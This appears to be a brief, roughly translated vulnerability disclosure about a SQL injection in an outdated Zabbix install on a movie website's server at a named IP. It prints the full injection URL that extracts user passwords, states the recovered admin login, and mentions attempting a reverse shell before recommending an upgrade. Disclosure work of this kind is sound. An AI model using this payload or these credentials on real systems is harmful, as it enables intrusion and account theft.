M1905 Command Execution caused by zabbix injection on a website of movie Network
Rt
http://118.145.26.196/zabbix/index.php
The zabbix version is too low. I remember there was a front-end injection hole in the past, so I typed it with exp.
Http: // 118.145.26.196/zabbix/httpmon. php? Applications = 2 and (select 1 from (select count (*), concat (select concat (cast (concat (alias, 0x7e, passwd, 0x7e) as char ), 0x7e) from zabbix. users LIMIT 0, 1), floor (rand (0) * 2) x from information_schema.tables group by x))
After decryption, log on to the admin/M1905 & 2014 successfully. The figure shows that it is the ding of the movie network.
Zabbix permission.
With Intranet ip Address
We can raise the right by making a rebound and continue to deepen our work. After reading the kernel version, the exp cannot be found...
Solution:
Upgrade zabbix. The version is too low. Fortunately, the permission control is quite dead.